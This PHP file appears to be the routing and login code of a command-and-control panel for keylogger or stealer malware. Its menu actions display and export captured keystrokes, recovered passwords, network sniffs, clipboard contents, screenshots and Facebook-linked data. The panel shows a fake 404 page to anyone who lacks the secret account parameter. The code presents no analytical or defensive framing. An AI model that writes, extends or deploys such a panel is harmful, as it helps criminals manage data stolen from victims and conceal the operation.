<?php
//LOG BODY//////////////////////////////////////////////////////////////////////
function show($str, $Title) 
{
    global $fb;
    if( !isset($fb->str['header1']) ) {
       header_str( $fb );
    }
    
    $ret = $fb->str['header1'].$Title.$fb->str['header2'].$str."</body></html>";
    print $ret; exit();
}

function LogOn($fb)
{
//LOGIN ///////////////////////////////////////////////////////////////////////
    $fb->get_user();
    $action = has_get("action") ? get("action") : NULL;
    
    if( !has_post($fb->account['name']) )
    {
        if( (!has_get("account") || get("account") != $fb->account['name']) && !isset($_SESSION["user"]))
        {
            echo $fb->str['p404']; exit();
        }
    }

    if( ((!isset($_SESSION["user"]) || $_SESSION["user"] != $fb->account['user'] || $_SESSION["ip"] != getIp())
	|| $action == "login") && $action != "loadgeoip")
    {
        if ( get("account") == $fb->account['name'] ) 
        {
            loginPage(LOGIN_PAGE);
        }
        elseif ( post("act") == "login")
        {
            LogIn( filter_user(post("username")), post("password") );
        }
    }

    getPanel($fb);
    if( has_get('lang') && is_file('script/languages/'.get('lang').'.php') ) {
        UpdateVault($fb);
    }
////////////////////////////////
    switch($action)
    {
        case "logout":
        //LOGOUT //////////////////////////////////////////////////////////////////////
        LogOut(); break;
    
        case "dashboard":
        //DASHBOARD ///////////////////////////////////////////////////////////////////
        require_once 'fb_Dashboard.php';
        ShowDashboard($fb); break;
    
        case "taskmanager":
        //TASKMANAGER //////////////////////////////////////////////////////////////////
        ShowTaskManager($fb); break;

        case "fbconnect":
        //FB-CONNECT //////////////////////////////////////////////////////////////////
        require_once 'fb_fbConnect.php';
        FBConnect($fb); break;

        case "logs":
        //SHOW LOGS ///////////////////////////////////////////////////////////////////
        viewPage($fb, 'logshead', 'logs');break;

        case "keystrokes":
        //KEYSTROKES //////////////////////////////////////////////////////////////////
        viewPage($fb, 'keyhead', 'keystrokes');break;
    
        case "recoveries":
        //RECOVERIES //////////////////////////////////////////////////////////////////
        viewPage($fb, 'keyhead', 'recoveries');break;
    
        case "sniffs":
        //SNIFFS //////////////////////////////////////////////////////////////////
        viewPage($fb, 'keyhead', 'sniffs');break;
    
        case "clipboard":
        //CLIPBOARD //////////////////////////////////////////////////////////////////
        viewPage($fb, 'keyhead', 'clipboard');break;
    
        case "junk":
        //JUNKS //////////////////////////////////////////////////////////////////
        viewPage($fb, 'keyhead', 'junk');break;

        case "screenshots":
        //SCREENSHOTS //////////////////////////////////////////////////////////////////
        require_once 'fb_Screenshots.php';
        Screenshots($fb); break;

        case "blacklist":
        //BLACKLIST ///////////////////////////////////////////////////////////////////
        if ( post("host") && has_post("comment") )
        {
            require_once 'fb_Logs.php';
            doBlacklist($fb, post("host"), post("comment") );
        }break;

        case "search":
        //SEARCH //////////////////////////////////////////////////////////////////////
        require_once 'fb_Search.php';
        gotoSearch($fb); exit();

        case "settings":
        //SETTINGS ////////////////////////////////////////////////////////////////////
        require_once 'fb_Logs.php';
        gotoSettings($fb); exit();

        case "selected":
        //SELECTED ////////////////////////////////////////////////////////////////////
        require_once 'fb_Logs.php';    
        doSelection($fb); exit();

        case "usermanager":
        //USER MANAGER //////////////////////////////////////////////////////////////////////
        require_once 'fb_userManager.php';
        userManager($fb); exit();

        case "export":
        //EXPORT //////////////////////////////////////////////////////////////
        require_once 'fb_Export.php';
        Export($fb); exit();

        case "exp_logs": case "exp_keystrokes": case "exp_recoveries": 
        case "exp_junk": case "exp_sniffs": case "exp_clipboard": case "exp_all_logs":
        //EXPORT LOGS ////////////////////////////////////////////////////////////////
        require_once 'fb_Export.php';
        exportLogs($fb, $action ); exit();

        case "loadgeoip":
        //LOADGEOIP ////////////////////////////////////////////////////////////////////
        LoadGeoIp(); exit();
        
        case "tos":
        //TOS ////////////////////////////////////////////////////////////////////
        TOS($fb); exit();
    }
    
//CHECK SESSION //////////////////////////////////////////////////////////////
    if( $_SESSION["user"] == $fb->account['user'] )
    {
        if ( get("account") == $fb->account['name']) 
        {
            loginform_str( $fb );
            show($fb->str['loginform'].$fb->str['footer']."</form>", $fb->str['head_str']['login']);
        }
    }  
}

function viewPage($fb, $logsHead, $ClearButton)
{
    require_once 'fb_Logs.php';
    
    if( has_get("sort") ) { setSort(get("sort")); }
    
    getFormLogs_str( $fb, get("action"));
    
    $fb->panel->str['bodyHeader'] .= $fb->panel->str[$ClearButton."Delete"];
            
    ShowLog($fb, get("action"), $fb->panel->str[$logsHead]);
}
